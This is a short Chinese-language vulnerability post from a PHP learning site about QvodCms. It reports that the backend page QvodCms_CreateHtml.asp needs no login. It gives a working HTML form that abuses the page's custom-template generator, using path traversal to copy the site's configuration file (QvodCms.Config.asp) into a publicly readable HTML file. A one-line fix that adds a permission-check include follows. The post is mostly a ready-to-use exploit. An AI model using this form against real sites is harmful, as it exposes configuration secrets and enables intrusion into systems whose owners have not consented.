来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 后台的 QvodCms_CreateHtml.asp 不需要登陆即可访问利用其中的 生成自定义模板 可以生成一个任意文件,文件内容,可以指向 网站的任何一个文件form method=post action=http://域名/后台/QvodCms_Cr...
|
后台的 QvodCms_CreateHtml.asp 不需要登陆即可访问
利用其中的 “生成自定义模板” 可以生成一个任意文件,文件内容,可以指向 网站的任何一个文件
<form method="post" action="http://域名/后台/QvodCms_CreateHtml.asp?action=other" target="msg1793">
<input name="jstype" type="hidden" value="Define">
<input name="jsname" type="hidden" value="Define">
自定义模板保存路径:<input name="cpath" type="text" value="../wdtasdf.html" style="color:#FF0000">
<select name="Define" onChange="cpath.value='../'+this.options[this.selectedIndex].value;">
<option value="../../../Cache/QvodCms.Config.asp" selected="selected">Config</option>
</select> <input type='submit' value='生成自定义模板'>
</form>
<iframe style="z-index:1;visibility:inherit;width:100%;height:100px;" name="msg1793" frameborder="0" scrolling="yes"></iframe>
修复方案:
在文件中加入权限检测代码 <!--#include file="QvodCms_Check.asp"-->
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
